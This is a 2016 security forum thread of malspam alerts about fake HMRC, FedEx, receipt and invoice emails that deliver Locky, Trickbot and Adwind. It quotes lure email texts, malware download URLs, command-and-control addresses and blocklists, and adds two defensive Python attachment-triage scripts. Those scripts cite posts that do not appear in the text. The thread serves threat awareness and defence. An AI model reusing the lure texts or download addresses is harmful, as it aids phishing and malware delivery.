17 Oct 2016 - "An email with the subject of 'Final payment request' pretending to come from angela.fynan@ hmrc.gsi .gov.uk <info@ websitesage60 .us> with a malicious word doc attachment is another one from the current bot runs... I do not know exactly what malware this downloads... The website that the macro inside the malicious word doc connects to is not owned or controlled by HMRC or any other part of the UK government and has been registered to be used as a malware/fraud site http ://hmrc.gsigov .co.uk using false details:
- http://whois.domaintools.com/gsigov.co.uk .. on IP 185.81.113.102 ...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2016/10/Final-payment-request_hmrc-1024x771.png

The word doc, which falsely states it was created in an earlier version of Word and that you 'should enable editing to view it', when opened safely pretends to be a VAT notice and surcharge liability saying you need to pay £29,678:
> https://myonlinesecurity.co.uk/wp-content/uploads/2016/10/hmrc_17_oct_2017-1024x800.png

17 October 2016: 18066000010075130101.doc - Current Virus total detections 4/54*. MALWR** shows a download from
http ://hmrc.gsigov .co.uk/vat.exe (VirusTotal 4/56***). Payload Security [1] [2] ... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...cd94e7f0d54c87a6d01ec574/analysis/1476717095/

** https://malwr.com/analysis/NmViZmE4MTQ0NjU0NGQ5YjgxYjJkNDUzNDBiZGU2MTg/
Hosts
185.81.113.102: https://www.virustotal.com/en/ip-address/185.81.113.102/information/
> https://www.virustotal.com/en/url/8...d262112aa88280086f712ce25bf1ebb33a8/analysis/

*** https://www.virustotal.com/en/file/...9508d52fa0f87a853079d687/analysis/1476724305/

1] https://www.hybrid-analysis.com/sam...880cd94e7f0d54c87a6d01ec574?environmentId=100
Contacted Hosts
185.81.113.102

2] https://www.hybrid-analysis.com/sam...a3b9508d52fa0f87a853079d687?environmentId=100

:fear::fear: :mad:
 
Fake 'RE: P/O' SPAM

FYI...

Fake 'RE: P/O' SPAM - delivers java adwind
- https://myonlinesecurity.co.uk/re-po-malspam-delivers-java-adwind/
19 Oct 2016 - "We continue to be plagued daily by -fake- financial themed emails containing java adwind attachments... The email looks like:
From: Sales <order@ ncima-holding .ci>
Date: Tue 18/10/2016 18:28
Subject: RE: P/O
Attachment: NEW P.O.zip
Attached is the Purchase order list
please confirm so we can proceed.
Thank you.
——————————-
sent from my iPad ...


19 October 2016: New P.O.jar (273kb) - Current Virus total detections 9/56*. Payload Security**...
This is another one of the files that unless you have "show known file extensions" enabled, can easily be mistaken for a genuine DOC/PDF/JPG or other common file instead of the .EXE/.JS file it really is, so making it much more likely for you to accidentally open it and be infected... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...544a258f48ba66316c0613a7/analysis/1476831444/

** https://www.hybrid-analysis.com/sam...528544a258f48ba66316c0613a7?environmentId=100

:fear::fear: :mad:
 
Fake 'Credit Note', 'FedEx', 'ACH Payment' SPAM

FYI...

Fake 'Credit Note' SPAM - delivers trickbot/dyre banking Trojan
- https://myonlinesecurity.co.uk/cred...alspam-delivers-trickbot-dyre-banking-trojan/
20 Oct 2016 - "... an email with the subject of 'Credit Note CN-81553 from Nordstrom Inc (7907)' pretending to come from Accounts <message-service@ post. xero .com> with a random named/numbered zip attachment containing an .scr file. The icon on this SCR file looks like an adobe PDF icon... One of the emails looks like:
From: Accounts <message-service@ post. xero .com>
Date: Thu 20/10/2016 01:21
Subject: Credit Note CN-81553 from Nordstrom Inc (7907)
Attachment: CN_81274.zip
Hi Orlando,
Attached document is your credit note CN-81553 for 508.18 AUD.
This has been allocated against invoice number.
If you have any questions, please let us know.
Thanks,
Staff Leasing Inc.


20 October 2016: CN_81274.zip: Extracts to: CN-81274.scr - Current Virus total detections 17/57*
.. Payload Security** shows a download/drop of another file RXGp0aqU55eY5AnMxB.exe.exe (VirusTotal 8/57***)
Payload Security[4] .. appears to be dyre/trickloader banking Trojan ... This is another one of the files that unless you have "show known file extensions" enabled, can easily be mistaken for a genuine DOC/PDF/JPG or other common file instead of the .EXE/.JS file it really is, so making it much more likely for you to accidentally open it and be infected... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...98fe1f3ffc88968c7fd2a19a/analysis/1476937031/

** https://www.hybrid-analysis.com/sam...e1398fe1f3ffc88968c7fd2a19a?environmentId=100
Contacted Hosts
185.14.29.13
78.47.139.102
91.219.28.77


*** https://www.virustotal.com/en/file/...8db5134a297e6558281f862d/analysis/1476932944/

4] https://www.hybrid-analysis.com/sam...7938db5134a297e6558281f862d?environmentId=100
Contacted Hosts
78.47.139.102
91.219.28.77
80.79.114.179

___

Fake 'FedEx' SPAM - delivers ransomware
- https://myonlinesecurity.co.uk/fake...alspam-emails-continue-to-deliver-ransomware/
20 Oct 2016 - "We are seeing an uptick in the 'FedEx - unable to deliver' malspam emails this week... they are so common and I always get 1 or 2 every day.. today I am receiving quite an increase in numbers over the usual amount... With the holiday season quickly approaching and many more people shopping online, we will see a dramatic increase in these over the next few weeks and months as more people wait for their deliveries... The sort of subjects that you see with this malspam nemucod ransomware campaign which will always have random numbers include:
Delivery Notification, ID 00898050
Shipment delivery problem #0000613766
Problem with parcel shipping, ID:0000857607
Problems with item delivery, n.00000693983
Unable to deliver your item, #0000274397


One of the emails looks like:
From: FedEx Ground <wade.barry@ hosteriasanpatricio .com .ar> or FedEx 2Day A.M. <ruben.morris@ hosteriasanpatricio .com .ar>
Date: Thu 01/09/2016 19:22
Subject: Shipment delivery problem #0000613766 or Delivery Notification, ID 00898050
Attachment: FedEx_ID_0000613766.zip
Dear Customer,
We could not deliver your item.
Please, open email attachment to print shipment label.
Sincerely,
Wade Barry,
Sr. Support Agent.

Or
Dear Customer,
We could not deliver your item.
Shipment Label is attached to email.
Warm regards,
Ruben Morris,
Sr. Operation Manager.


20 October 2016: FedEx_ID_0000613766.zip: Extracts to: FedEx_ID_0000613766.doc.wsf
Current Virus total detections 25/55*: Payload Security** shows downloads of the usual multiple files from
www .industrial-automation .at/counter/?ad=17MGS22ZVQcqSyHw4VU2NvC5SL4eCPhCJb&id=LZUB9RUv-KCRW63gDdZ5mD075Y_vJ1F6feiXr_Sv5Nbbhxr8QKIPLwoOhYdjCOIqaWV65TnMZepmeok-Renqlmw1ioeBLbM8&rnd=01
(with a range from 01–04 that delivers different parts of the malware package)...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...264fb5cbe552a48b141e16f6/analysis/1476944618/

** https://www.hybrid-analysis.com/sam...595264fb5cbe552a48b141e16f6?environmentId=100
Contacted Hosts
212.152.181.199
___

Fake 'ACH Payment' SPAM - delivers trickbot/dyre banking Trojan
- https://myonlinesecurity.co.uk/ach-...alspam-delivers-trickbot-dyre-banking-trojan/
20 Oct 2016 - "... an email with the subject of 'ACH Payment Notification' pretending to come from ap_vendor_pay2@ bankofamerica .com with a random named/numbered zip attachment containing an .scr file. The icon on this SCR file looks like an adobe PDF icon... One of the emails looks like:
From: ap_vendor_pay2@ bankofamerica .com
Date: Thu 01/09/2016 19:22
Subject: ACH Payment Notification
Attachment: payment002828870.zip
LOGICEASE SOLUTIONS INC Vendor:10288253 Pay Dt: 20150903
Pay Ref Num: 2000548044
Please download and view payment document attached.
Your invoice has been processed for payment by Bank of America Corporate Accounts Payable. The following items are included in this payment:
The net amount deposited to account number ending XXXX3195
designated by you is $1019.93
IMPORTANT: AVAILABILITY OF FUNDS FOR WITHDRAWAL IS SUBJECT TO POSTING BY RECEIVING BANK (USUALLY WITHIN THREE BUSINESS DAYS)
Please do not respond to this e-mail. Should you have questions, please contact the Purchasing, Payment & Reimbursement helpline at 888.550.7486.
This message, and any attachments, is for the intended recipient’s only, may contain information that is privileged, confidential and/or proprietary and subject to important termsr. If you are not the intended recipient, please delete this message.


20 October 2016: payment002828870.zip: Extracts to: paymen1189d2028.scr . Current Virus total detections 8/56*
.. Payload Security** shows this is likely to be Trickbot/Dyre banking Trojan... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...2da9c001307cf11a49fb9672/analysis/1476964410/

** https://www.hybrid-analysis.com/sam...7a92da9c001307cf11a49fb9672?environmentId=100
Contacted Hosts
78.47.139.102
91.219.28.77


:fear::fear: :mad:
 
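The posts above keep coming back to the same delivery shape: a zip whose single member is a .wsf/.js/.hta/.scr/.jar script, a double extension such as FedEx_ID_0000613766.doc.wsf that reads as a document when known extensions are hidden, a .cab that Explorer opens natively, and a Word document whose macro fetches the payload. The following is an added example, not code from the forum posts or the quoted blogs, showing how a mail-gateway check can triage such attachments: samples are constructed in memory using member names copied from the posts (the contents are dummies, no real malware), the container is identified by magic bytes rather than by the attachment's name, and an OOXML document is flagged when it carries a VBA project. The assumed extension lists and the fake .cab header are this example's own; binary OLE .doc files like the Invoice lure would need olefile/oletools and are not parsed here.

```python
"""Attachment triage for the zip-wrapped script lures described in this thread.

Added example, not code from the forum posts or the quoted blogs. Samples
are constructed in memory (no real malware): member names copied from the
posts above, a fake .cab header, and an OOXML document with a VBA project.
"""
import io
import zipfile

# Script and executable extensions seen in the posts (.wsf, .js, .hta, .scr,
# .jar) plus the usual relatives; the set is this example's assumption.
SCRIPT_EXT = {"wsf", "js", "jse", "hta", "vbs", "vbe", "scr", "exe", "jar",
              "cmd", "bat", "ps1", "lnk"}
# Innocent-looking extensions used as the first half of a double extension.
DECOY_EXT = {"doc", "docx", "pdf", "jpg", "png", "xls", "xlsx", "txt"}
NESTED_EXT = {"zip", "cab", "rar", "7z"}


def member_reasons(name):
    """Reasons one archive member name matches the lures in the posts."""
    base = name.replace("\\", "/").rsplit("/", 1)[-1].lower()
    parts = base.split(".")
    reasons = []
    if len(parts) < 2:
        return reasons
    ext = parts[-1]
    if ext in SCRIPT_EXT:
        reasons.append(f"script or executable extension .{ext}")
    if len(parts) >= 3 and parts[-2] in DECOY_EXT and ext in SCRIPT_EXT:
        reasons.append(f"decoy double extension .{parts[-2]}.{ext}")
    if ext in NESTED_EXT:
        reasons.append(f"nested archive .{ext}")
    return reasons


def container_type(data):
    """Identify the container by magic bytes, not by the attachment's name."""
    if data.startswith(b"PK\x03\x04"):
        return "zip"
    if data.startswith(b"MSCF"):
        return "cab"
    return "other"


def triage_attachment(filename, data):
    """Return (member, reason) pairs for one e-mail attachment."""
    kind = container_type(data)
    if kind == "cab":
        # The Dridex post notes Explorer opens .cab natively on double-click;
        # parsing CAB is out of scope here, so the container itself is flagged.
        return [(filename, "cab archive: Explorer extracts it natively; inspect before opening")]
    if kind != "zip":
        return [(filename, r) for r in member_reasons(filename)]
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        for name in names:
            if name.endswith("/"):
                continue
            findings.extend((name, r) for r in member_reasons(name))
        # .docx/.docm are zips; a vbaProject.bin part means the document
        # carries macros (binary OLE .doc needs olefile/oletools instead).
        if "word/vbaProject.bin" in names:
            findings.append((filename, "OOXML document carries a VBA project (macro)"))
    return findings


def make_zip(members):
    """Build a zip in memory from {name: bytes} (constructed sample)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, body in members.items():
            zf.writestr(name, body)
    return buf.getvalue()


# Constructed samples; names are taken from the posts, contents are dummies.
SAMPLES = {
    "Travel_Itinerary-a884558.zip": make_zip({"Travel_Itinerary-4F2AD50.wsf": b"<job><script/></job>"}),
    "FedEx_ID_0000613766.zip": make_zip({"FedEx_ID_0000613766.doc.wsf": b"<job/>"}),
    "CN_81274.zip": make_zip({"CN-81274.scr": b"MZ"}),
    "Form.cab": b"MSCF" + b"\x00" * 32,
    "Invoice_42888419.docm": make_zip({
        "[Content_Types].xml": b"<Types/>",
        "word/document.xml": b"<w:document/>",
        "word/vbaProject.bin": b"\xd0\xcf\x11\xe0",
    }),
    "report_clean.zip": make_zip({"report.pdf": b"%PDF-1.4"}),
}


def triage_all(samples=SAMPLES):
    """Map each attachment name to its findings (empty list = nothing flagged)."""
    return {name: triage_attachment(name, data) for name, data in samples.items()}


if __name__ == "__main__":
    for name, findings in triage_all().items():
        print(("QUARANTINE " if findings else "ok         ") + name)
        for member, reason in findings:
            print(f"    {member}: {reason}")
```

Checking the magic bytes first matters because the Dridex post describes a second run that swapped .cab for .zip to dodge filters keyed on the extension; a gateway that trusts the attachment name would miss a CAB renamed to .zip, while this check sees the MSCF header either way.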
Fake 'Receipt', 'Complaint letter' SPAM, Trick Bot – malvertising

FYI...

Fake 'Receipt' SPAM - leads to Locky
- http://blog.dynamoo.com/2016/10/malware-spam-fake-receipt-leads-to.html
24 Oct 2016 - "Locky ransomware activity has been quite minimal recently, but it seems to be back today. For example, spam with a format similar to the following is currently being sent out:
Date: Mon, 24 Oct 2016 16:03:30 +0530
From: christa.hazelgreave@ gmail .com
Subject: Receipt 68-508


Sender name is a randomly-generated Gmail address. Attached is a ZIP file starting with the word "Receipt", matching the subject of the email; contained within is a malicious HTA file with a name similar to Receipt 90592-310743.hta. You can see some of the malicious activity in this Hybrid Analysis*...
(List of domain-names at the dynamoo URL above.)
The malware is Locky ransomware phoning home to:
109.234.35.215/linuxsucks .php (McHost.ru, Russia)
91.200.14.124/linuxsucks .php [hostname: artem.kotyuzhanskiy .example .com] [91.200.14.124] (SKS-Lugan / Vhoster, Ukraine)
185.102.136.77/linuxsucks .php [hostname: artkoty.mgn-host.ru] [185.102.136.77] (MGNHOST, Russia)
bwcfinnt .work/linuxsucks .php [208.100.26.234] (Steadfast, US) ...
Recommended blocklist:
109.234.35.0/24
91.200.14.124
185.102.136.77
208.100.26.234
"
* https://www.hybrid-analysis.com/sam...b15270f3bf4a5448d56b07acc03?environmentId=100
Contacted Hosts
96.0.115.240
107.180.23.49
216.239.139.112
120.117.3.119


- https://myonlinesecurity.co.uk/blan...ail-com-delivers-locky-with-a-shit-extension/
24 Oct 2016 - "... Locky downloader.. a blank/empty email with the subject of 'Receipt 00180-6477' (random numbers) pretending to come from random names at gmail .com with a semi-random named zip attachment starting with 'receipt' that matches the subject containing a random numbered wsf file starting with 'receipt'... One of the emails looks like:
From: jennie.winzer@ gmail .com
Date: Mon 24/10/2016 15:05
Subject: Receipt 00180-6477
Attachment: Receipt 00180-6477.zip


Body content: Totally blank/empty

24 October 2016: Receipt 00180-6477.zip: Extracts to: Receipt 83357-830129.wsf
Current Virus total detections 11/55*.. MALWR** shows a download of an encrypted file from
http ://beyondhorizon .net/076wc?EVgYCyg=JQHYinB which is transformed by the script to uYYRbVgee1.dll
(VirusTotal 6/57***). Payload Security[4]... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...8fdd142c912c14737ce04467/analysis/1477318650/

** https://malwr.com/analysis/ZGI2ODk1MjYyNjQ4NDNlZGJkYzE4ZmZlNDhkNzA4Yzc/
Hosts
192.185.96.52

*** https://www.virustotal.com/en/file/...1a42314d6f8c945e86ac5705/analysis/1477325610/

4] https://www.hybrid-analysis.com/sam...adf8fdd142c912c14737ce04467?environmentId=100
Contacted Hosts
192.185.96.52
185.102.136.77
91.200.14.124
109.234.35.215
69.195.129.70
208.100.26.234

___

Fake 'Complaint letter' SPAM - leads to Locky
- http://blog.dynamoo.com/2016/10/malware-spam-complaint-letter-leads-to.html
24 Oct 2016 - "This spam leads to Locky ransomware:
From "Justine Hodge"
Date Mon, 24 Oct 2016 19:27:53 +0600
Subject Complaint letter
Dear [redacted],
Client sent a complaint letter regarding the data file you provided.
The letter is attached.
Please review his concerns carefully and reply him as soon as possible.
Best regards,
Justine Hodge


The name of the sender varies. Attached is a ZIP file with a name similar to saved_letter_e154ddcc.zip containing a malicious .JS script with a name starting with "saved letter"... scripts download...
(Long list of domain-names at the dynamoo URL above.)
The malware phones home to the following URLs:
109.234.35.215/linuxsucks .php (McHost .ru, Russia)
91.200.14.124/linuxsucks .php [hostname: artem.kotyuzhanskiy.example .com] [91.200.14.124] (SKS-Lugan / Vhoster, Ukraine)
185.102.136.77/linuxsucks .php [hostname: artkoty.mgn-host .ru] [185.102.136.77] (MGNHOST, Russia)
81.177.22.221/linuxsucks.php (Netplace, Russia)...
... Recommended blocklist:
109.234.35.0/24
91.200.14.124
185.102.136.77
81.177.22.221
"

- https://myonlinesecurity.co.uk/complaint-letter-malspam-delivers-locky-using-a-shit-extension/
24 Oct 2016 - "... Locky downloader.. an email with the subject of 'Complaint letter' coming as usual from random companies, names and email addresses with a semi-random named zip attachment starting with saved_letter containing a js file... One of the emails looks like:
From: Mia Dickerson <Dickerson.0865@ pipelinemedia .com.au>
Date: Mon 24/10/2016 12:58
Subject: Complaint letter
Attachment: saved_letter_9ff72a60.zip
Dear [redacted], Client sent a complaint letter regarding the data file you provided. The letter is attached. Please review his concerns carefully and reply him as soon as possible. Best regards, Mia Dickerson


24 October 2016: saved_letter_9ff72a60.zip: Extracts to: saved letter 9A2B8.js
Current Virus total detections 11/55*.. MALWR** shows a download of an encrypted file from
http ://gruffcrimp .com/352gr0 which is transformed by the script to RuBjy2wiCxyLGr.dll (VirusTotal 9/57***).
Payload security[4] shows the download from
adultmagstore .com/itc0h81 and the c2 from a load of different servers -all- using /linuxsucks .php...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...3a2a56648c98da97e9b6e1aa/analysis/1477310600/

** https://malwr.com/analysis/NTZkNDY3NGEzYjJhNDMzN2EyZmEyYzRiM2U1NTNiNmU/
Hosts
67.171.65.64

*** https://www.virustotal.com/en/file/...9a2acda71a1faa931bf16283/analysis/1477329868/

4] https://www.hybrid-analysis.com/sam...1523a2a56648c98da97e9b6e1aa?environmentId=100
Contacted Hosts
66.154.71.36
81.177.22.221
185.102.136.77
91.200.14.124
109.234.35.215
69.195.129.70

___

Trick Bot – spread via malvertising ...
- https://blog.malwarebytes.com/threat-analysis/2016/10/trick-bot-dyrezas-successor/
Oct 24, 2016 - "... payload was spread via a malvertising campaign, involving Rig Exploit Kit:
> https://blog.malwarebytes.com/wp-content/uploads/2016/10/malvertising_chain.png
... After being deployed, Trick Bot copies itself into %APPDATA% and deletes the original sample... Trick Bot is composed of several layers. As usual, the first layer is used for the protection – it carries the encrypted payload and tries to hide it from AV software:
> https://blog.malwarebytes.com/wp-content/uploads/2016/10/schema-1.png
... Below we can see its decrypted form revealing the attacked online-banking systems:
> https://gist.githubusercontent.com/...2ca8fc4df7edb464d2fa5e3f9d4e665cb1de/dinj.xml
Conclusion: Trick Bot has many similarities with Dyreza, visible at the code design level as well as the communication protocol level. However, comparing the code of both shows that it has been rewritten from scratch. So far, Trick Bot does not have as many features as Dyreza bot. It may be possible that the authors intentionally decided to make the main executable lightweight, and focus on making it dynamically expandable using downloaded modules. Another option is that it is still not the final version. One thing is sure – it is an interesting piece of work, written by professionals. Probability is very high that it will become as popular as its predecessor."
Appendix: http://www.threatgeek.com/2016/10/trickbot-the-dyre-connection.html – analysis of the TrickBot at Threat Geek Blog
'Trickbot C2s:
188.138.1.53 :8082
27.208.131.97 :443
37.109.52.75 :443
91.219.28.77 :443
193.9.28.24 :443
37.1.209.51 :443
138.201.44.28 :443
188.116.23.98 :443
104.250.138.194 :443
46.22.211.34 :443
68.179.234.69 :443
5.12.28.0 :443
36.37.176.6 :443'
(More detail at the malwarebytes URL at the top of this post.)

Fake 'Budget forecast', 'Scan Data', 'Wrong model' SPAM

FYI...

Fake 'Budget forecast' SPAM - delivers Locky
- https://myonlinesecurity.co.uk/budget-forecast-malspam-delivers-locky-with-a-shit-extension/
25 Oct 2016 - "... Locky downloader.. an email with the subject of 'Budget forecast' coming as usual from random companies, names and email addresses with a semi-random named zip attachment starting with 'budget' containing a vbs file that pretends to be an Excel .XLS file... One of the emails looks like:
From: Alejandra Rojas <Rojas.2910@ dsldevice .lan>
Date: Mon 24/10/2016 22:38
Subject: Budget forecast
Attachment: budget_xls_b71db945.zip
[redacted] asked me to send you the Budget forecast for next project. Please check and ask him if you are not clear with the task.


25 October 2016: budget_xls_b71db945.zip: Extracts to: budget 34A81F8A xls.vbs
Current Virus total detections 2/55*.. MALWR** shows a download of an encrypted file from
http ://fannyfuff .com/7qx9pmdt which is transformed by the script to QoTcrNU2qu051Uv0.dll (VirusTotal 21/57***).
Neither MALWR nor Payload Security[4] is showing the encrypted files... That might be due to a sandbox/ VM protection in the malware or it might not have run properly. Earlier versions yesterday [1] [2] using WSF, JS or HTA delivery methods did run fully in the online sandboxes. The vbs versions might not... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...f5e88b40f71e2994c05508ce/analysis/1477345935/

** https://malwr.com/analysis/MjY2NmFhM2NlNDMwNDYxNDhhMWZjNmJkM2YxNGYyYzk/
Hosts
67.171.65.64
77.123.137.221
91.200.14.124
91.226.92.225
185.102.136.77
69.195.129.70


*** https://www.virustotal.com/en/file/...a4124c159efbd508218441bb/analysis/1477378265/

4] https://www.hybrid-analysis.com/sam...ac7f5e88b40f71e2994c05508ce?environmentId=100
Contacted Hosts
201.238.211.140
91.226.92.225
185.102.136.77
77.123.137.221
91.200.14.124
69.195.129.70


1] https://myonlinesecurity.co.uk/complaint-letter-malspam-delivers-locky-using-a-shit-extension/

2] https://myonlinesecurity.co.uk/blan...ail-com-delivers-locky-with-a-shit-extension/
___

Fake 'Scan Data' SPAM - leads to Locky
- http://blog.dynamoo.com/2016/10/malware-spam-blank-document-file-image.html
25 Oct 2016 - "Perhaps minimalist spam works better - there is currently a Locky spam run with one of the subjects 'Blank / Document / File / Image / img / IMG / Pic / Picture / Scan Data' plus a number (e.g. "Picture 4") with a ZIP file attached matching the subject (e.g. Picture 4.zip) which in turn contains a malicious Javascript... There is no body text... These automated analyses [1] [2]... show that it is Locky...
(Long list of domain-names at the dynamoo URL above.)
... The URL is appended with a random query string, e.g. ?EsIemTBBP=LHvybwFTeh
A malicious DLL is dropped with an MD5 of 7a131fff8eaf144312494988300d7dc1 and a detection rate of 4/56*. The malware then phones home to one of the following locations:
185.127.27.100/linuxsucks .php [hostname: artem.kotyuzhanskiy.example.com] (JSC "Informtehtrans", Russia)
91.200.14.124/linuxsucks .php [hostname: artem.kotyuzhanskiy.example.com] (SKS-Lugan / VHoster, Ukraine)
77.123.137.221/linuxsucks .php (Volia DataCentre, Ukraine)
... Recommended blocklist:
185.127.27.100
91.200.14.124
77.123.137.221
"
1] https://www.hybrid-analysis.com/sam...cc6e5e3fa13701fa36d4eb47a6b?environmentId=100
Contacted Hosts
103.247.11.115
46.105.246.22
91.200.14.124
185.127.27.100
77.123.137.221


2] https://www.hybrid-analysis.com/sam...cdedff614c63243ddc33a2bbf80?environmentId=100
Contacted Hosts
203.190.54.3
91.200.14.124
77.123.137.221
185.127.27.100


* https://virustotal.com/en/file/5948...9c78e6b021b6af6928f16a0d/analysis/1477405965/

- https://myonlinesecurity.co.uk/blank-image-picture-doc-malspam-delivers-locky/
25 Oct 2016 - "... Locky downloader... a blank empty email with a variety of subjects like scan, image, pic, doc etc. pretending to come from random names at Gmail .com with a zip attachment that matches the subject containing a js file... Some of the subjects seen include:
Image 249
Blank 962
Document 7
Pic 3
Scan Data 405
Picture 125
File 11
Doc 74
img 7


One of the emails looks like:
From: HUGH HALVERSON <hughhalverson94@ gmail .com>
Date: Tue 25/10/2016 14:47
Subject: Image 249
Attachment: Image 249.zip


Body content: totally empty/blank

25 October 2016: Image 249.zip: Extracts to: Pic 767.js - Current Virus total detections 9/54*
.. MALWR** shows a download of an encrypted file from
http ://rajashekharkubasad .com/g76dbf?ettSsUhngke=NlfFMTpqoQa which is transformed by the script to WgNUiSSFP1.dll (VirusTotal 3/56***). Payload Security[4] shows this version is using .thor extension for the encrypted files... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...d5363393cca623288c099616/analysis/1477403985/

** https://malwr.com/analysis/NDRiZTdiZmRhMjBjNGYzZmIzN2QzNzk3N2U0YzEyMjc/
Hosts
43.225.54.151

*** https://www.virustotal.com/en/file/...9c78e6b021b6af6928f16a0d/analysis/1477405261/

4] https://www.hybrid-analysis.com/sam...9f7d5363393cca623288c099616?environmentId=100
Contacted Hosts
43.225.54.151
185.127.27.100
77.123.137.221
91.200.14.124

___

Fake 'Wrong model' SPAM - delivers Locky
- https://myonlinesecurity.co.uk/wrong-model-malspam-delivers-locky/
25 Oct 2016 - "... Locky downloader... an email with the subject of 'Wrong model' coming as usual from random companies, names and email addresses with a semi random named zip attachment starting with fixed_invoice containing a vbs file... One of the emails looks like:
From: Randal Burks <Burks.3744@ pocketgreens .com>
Date: Tue 25/10/2016 19:45
Subject: Wrong model
Attachment: fixed_invoice_74957728.zip
We apologize for sending the wrong model of the product yesterday. Attached is the new invoice for your product No. 31066460.


25 October 2016: fixed_invoice_74957728.zip: Extracts to: fixed invoice 8A3254C.vbs
Current Virus total detections 6/54*. MALWR** shows a download of an encrypted file from
http ://idesjot .net/3ab4af which is transformed by the script to B0HRoIuyMVXc7V.dll (VirusTotal 13/57***)...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/...2085383f06216bbf86144a43/analysis/1477421251/

** https://malwr.com/analysis/YjQyNWRmYTEyMWE2NGRjYzkzYjY4ZTc2YjI5MzgxMzA/
Hosts
67.171.65.64

*** https://www.virustotal.com/en/file/...41f443818c51cbc250350fd6/analysis/1477421558/
___

Another Day, Another Spam...
- https://isc.sans.edu/diary.html?storyid=21635
2016-10-25 - "... attackers always have new ideas to deliver their malicious content to us... Attached to this mail, a malicious ZIP file with a .pif file inside. The file is in fact a PE file (MD5: 2aa0d2ae9f8492e2b4acda1270616393). The hash was unknown to VT but once uploaded, it was reported as a very old worm, nothing very malicious... The second example, received by one of our readers, is a -fake- SharePoint notification:
> https://isc.sans.edu/diaryimages/images/sharepoint-spam.png
The link points to hxxp ://thekchencholing .org/.https/www/sharepoint.com/sites/shareddocument/SitePages/Home.aspx/index.php?wreply=YW5keS5nZXJhZXJ0c0BjZWdla2EuYmUN (the site has been cleaned up in the meantime). SharePoint is a common Microsoft tool used in big organizations and people could be lured by this kind of message. Most spam campaigns are easy to detect but some messages, when properly redacted, may lure the victim easily. We are never far from an unfortunate click. Stay safe!.."

thekchencholing .org: 180.210.205.66: https://www.virustotal.com/en/ip-address/180.210.205.66/information/
>> https://www.virustotal.com/en/url/c...faaff7dda425e1c8c5b4053a16d7e89b208/analysis/

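The attachments quoted in the runs above follow one pattern: a ZIP whose member is a Windows Script Host file (.wsf, .js, .jse, .vbs, .hta) or a .jar, often with a document token parked in front of the real extension ('budget 34A81F8A xls.vbs', '..._summary_pdf.jar'), or a file whose extension lies about its content (the 'png' in the later fax run that is really a renamed .exe). The following Python is an added example, not code from any of the quoted blogs, showing the triage a mail gateway or analyst script can do on such a ZIP before anyone double-clicks it. The member names are copied from the posts; the member bodies and the benign control file are constructed dummies, and the extension and decoy-token lists are assumptions about what you would want to quarantine.

```python
"""Triage a zip attachment for script droppers and mislabeled executables.

Added example (not from the quoted posts). Member names are taken from the
attachments described above; their contents are constructed dummies.
"""
import io
import re
import zipfile

# Dropper types seen in the posts above (.wsf/.js/.jse/.vbs/.hta/.jar/.pif),
# plus the usual native executables. Assumption: quarantine all of them.
SCRIPT_EXTENSIONS = {"wsf", "js", "jse", "vbs", "vbe", "hta", "jar", "pif",
                     "exe", "scr", "cmd", "bat"}
# Decoy tokens placed just before the real extension ('xls.vbs', 'pdf.jar').
DECOY_TOKENS = {"xls", "xlsx", "doc", "docx", "pdf"}


def classify_member(name, data):
    """Return the list of reasons this zip member should be quarantined (empty = clean)."""
    reasons = []
    base = name.rsplit("/", 1)[-1].lower()
    ext = base.rsplit(".", 1)[-1] if "." in base else ""
    if ext in SCRIPT_EXTENSIONS:
        reasons.append(f"executable/script extension .{ext}")
    # 'budget 34a81f8a xls.vbs' -> tokens [..., 'xls']; the last token before
    # the real extension is a document type meant to fool the reader.
    stem = base[: -len(ext) - 1] if ext else base
    tokens = [t for t in re.split(r"[ ._-]+", stem) if t]
    if ext in SCRIPT_EXTENSIONS and tokens and tokens[-1] in DECOY_TOKENS:
        reasons.append(f"decoy document token '{tokens[-1]}' before .{ext}")
    # Content sniffing: a PE header is an executable whatever the name says
    # (the 'jsjsjsihfsdkq.png' download in the fax run was a renamed .exe).
    if data[:2] == b"MZ":
        reasons.append("PE executable (MZ header)")
    if data[:2] == b"PK" and ext == "jar":
        reasons.append("Java archive")
    return reasons


def triage_zip(zip_bytes):
    """Map each file member of the archive to its quarantine reasons."""
    result = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            # Size/zip-bomb limits are left to the calling gateway.
            result[info.filename] = classify_member(info.filename, zf.read(info.filename))
    return result


def build_sample_zip():
    """Constructed sample archive: names from the posts above, dummy bodies."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Receipt 83357-830129.wsf", "<job><script language='JScript'></script></job>")
        zf.writestr("saved letter 9A2B8.js", "var a = 1;")
        zf.writestr("budget 34A81F8A xls.vbs", "Dim x")
        zf.writestr("Western_Union_Agent_Statement_and_summary_pdf.jar", b"PK\x03\x04dummy")
        zf.writestr("jsjsjsihfsdkq.png", b"MZ\x90\x00dummy-not-a-png")
        zf.writestr("quarterly.xlsx", b"PK\x03\x04dummy")  # benign control
    return buf.getvalue()


if __name__ == "__main__":
    for member, reasons in triage_zip(build_sample_zip()).items():
        print(f"{member!r}: {reasons or 'clean'}")
```

Matching on the last token before the extension rather than anywhere in the name keeps ordinary files like 'quarterly.xlsx' clean while still catching the space- and underscore-separated variants the posts show.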
Fake 'Help Desk', 'Your order', 'Invoice' SPAM, WhatsApp SCAMS

FYI...

